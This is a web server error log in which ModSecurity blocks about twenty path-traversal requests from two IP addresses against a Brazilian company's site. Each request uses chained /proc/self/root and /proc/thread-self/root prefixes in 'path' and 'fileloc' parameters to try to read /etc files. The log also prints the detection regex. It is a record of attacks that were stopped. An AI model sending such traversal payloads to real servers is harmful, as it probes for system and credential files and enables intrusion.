[Tue Mar 17 11:09:23.743591 2026] [:error] [pid 17965:tid 140411658000128] [client 74.7.243.203:52152] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgk6t8Nd0UC_OcbVG59AAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:09:27.249432 2026] [:error] [pid 8856:tid 140411607643904] [client 74.7.243.203:38576] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgl3UHeC6oxrTQ0VC3zAAAAdA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:09:33.936377 2026] [:error] [pid 9299:tid 140411548894976] [client 74.7.243.203:38578] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgnb-sgTmmJoPuMdypGwAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:09:38.491470 2026] [:error] [pid 8856:tid 140411582465792] [client 74.7.243.203:59444] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgoXUHeC6oxrTQ0VC30QAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:09:48.827530 2026] [:error] [pid 2473:tid 140411666392832] [client 74.7.243.203:57076] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgrKBJNF7axNlVR0UGZgAAAAk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:09:50.387533 2026] [:error] [pid 9155:tid 140411674785536] [client 74.7.243.203:39710] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgrtbI7zhHXcabyMUwCwAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:10:09.594472 2026] [:error] [pid 17965:tid 140411691570944] [client 74.7.243.203:54856] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgwat8Nd0UC_OcbVG6DwAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:10:21.237815 2026] [:error] [pid 18380:tid 140411582465792] [client 74.7.241.46:32960] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/group-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgza4xEDsg_V3ESNY9pwAAAhM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:10:22.547097 2026] [:error] [pid 9155:tid 140411590858496] [client 74.7.241.46:60214] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/anacrontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgztbI7zhHXcabyMUwGwAAAlI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:10:51.683093 2026] [:error] [pid 9299:tid 140411632822016] [client 74.7.243.203:35972] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablg67-sgTmmJoPuMdypPwAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:11:02.586721 2026] [:error] [pid 11293:tid 140411607643904] [client 74.7.241.46:40634] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/exports"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablg9dCmCSWTlPouqorWoQAAANA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:11:11.563748 2026] [:error] [pid 19125:tid 140411691570944] [client 74.7.241.46:46026] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/inittab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablg_85urE8i_Bs7KBR2vwAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:11:35.566920 2026] [:error] [pid 2325:tid 140411582465792] [client 74.7.241.46:39212] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyncd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablhF-82sZHvlq4xgHrN7gAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:11:40.161673 2026] [:error] [pid 17965:tid 140411607643904] [client 74.7.243.203:49302] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablhHKt8Nd0UC_OcbVG6IwAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:11:41.322164 2026] [:error] [pid 11293:tid 140411674785536] [client 74.7.243.203:56906] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablhHdCmCSWTlPouqorWtAAAAMg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:11:44.366611 2026] [:error] [pid 1016:tid 140411632822016] [client 74.7.243.203:56910] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablhIJqmL8PQht4WJFlRNwAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:11:49.479377 2026] [:error] [pid 19125:tid 140411590858496] [client 74.7.243.203:56920] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablhJc5urE8i_Bs7KBR2zAAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:11:52.311117 2026] [:error] [pid 8856:tid 140411708356352] [client 74.7.243.203:49528] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grep_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablhKHUHeC6oxrTQ0VC4CgAAAcQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:11:53.215131 2026] [:error] [pid 9155:tid 140411616036608] [client 74.7.241.46:39214] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudo.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablhKdbI7zhHXcabyMUwPwAAAk8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:11:58.168122 2026] [:error] [pid 18709:tid 140411683178240] [client 74.7.241.46:50536] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/percona-server.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablhLjarLhPAjZGI1b24qwAAA4c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:12:04.526638 2026] [:error] [pid 11293:tid 140411658000128] [client 74.7.243.203:39048] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablhNNCmCSWTlPouqorWuAAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
